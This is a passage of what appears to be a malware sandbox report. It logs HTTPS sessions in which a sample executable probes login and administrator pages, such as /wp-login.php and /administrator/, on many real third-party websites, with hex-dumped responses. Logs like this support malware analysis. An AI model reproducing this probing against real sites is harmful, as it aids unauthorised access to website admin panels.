                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16120INData Raw: 33 45 46 30 0d 0a 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 62 6c 6f 63 68 2f
                                                                                                                                                                                                    Data Ascii: 3EF0idden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/bloch/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC206INData Raw: 43 38 0d 0a 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 0d 0a
                                                                                                                                                                                                    Data Ascii: C8-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-5'><a href="htt
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16320INData Raw: 33 46 42 38 0d 0a 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 66 6c 65 78 70 65 73 2f 62 65 61 6d 6c 69 6e 65 2d 6f 70 74 69 63 73 2f 78 2d 72 61 79 2d 73 6f 75 72 63 65 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 58 2d 72 61 79 20 73 6f 75 72 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68
                                                                                                                                                                                                    Data Ascii: 3FB8ps://www.maxiv.lu.se/beamlines-accelerators/beamlines/flexpes/beamline-optics/x-ray-source/" class="menu-item-label">X-ray source</a></li></ul></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    182192.168.2.45941734.208.26.1524436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC230OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://micro-design.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC383INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 31 35 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheX-Powered-By: PHP/7.4.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micro-design.com/wp-json/>; rel="https://api
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><script>win
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC8192INData Raw: 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 32 32 32 32 32 32 32 32 32 32 32 32 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 36 36 36 36 36 36 36 36 36 36 36 37 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 38 38 38 38 38 38 38 38 38 38 38 39 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ntent h1{font-size:40px;font-size:2.2222222222222rem;line-height:1.4em;}h2,.entry-content h2{font-size:30px;font-size:1.6666666666667rem;line-height:1.25em;}h3,.entry-content h3{font-size:25px;font-size:1.3888888888889rem;line-height:1.2em;}h4,.entry-cont
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC8192INData Raw: 2e 35 65 6d 20 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 61 72 74 5f 69 74 65 6d 2e 65 64 64 5f 63 68 65 63 6b 6f 75 74 20 7b 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 31 2e 35 65 6d 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 3e 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 5f 5f 65 6d 70 74 79 2d 6d 65 73 73 61 67 65
                                                                                                                                                                                                    Data Ascii: .5em 1.5em;margin: 0;text-align: center;}.astra-cart-drawer .astra-cart-drawer-content .cart_item.edd_checkout {padding: 1em 1.5em 0;text-align: center;margin-top: 0;}.astra-cart-drawer .widget_shopping_cart_content > .woocommerce-mini-cart__empty-message
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    183192.168.2.45934174.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC291OUTGET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://himontessori.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    184192.168.2.459271213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC236OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC461INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 33 30 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 2304
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC4773INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC4191INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 37 66 63 0d 0a
                                                                                                                                                                                                    Data Ascii: 27fc
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5939INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6e 65 77 73 6c 65 74 74 65 72 2f 73 75 62 73 63 72 69 70 74 69 6f 6e 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 35 2e 31 2e 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 6f 6f 76 65 5f 67 64 70 72 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='newsletter-subscription-css' href='https://www.ceuandalucia.es/wp/wp-content/plugins/newsletter/subscription/style.css?ver=5.1.8' type='text/css' media='all' /><link rel='stylesheet' id='moove_gdpr_frontend-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC4297INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.ceuandalucia.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https://ww
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 35 62 66 35 0d 0a
                                                                                                                                                                                                    Data Ascii: 5bf5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    185192.168.2.45974854.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC174OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    186192.168.2.459191202.226.37.1584436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC167OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: daisyokogyo.co.jp
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
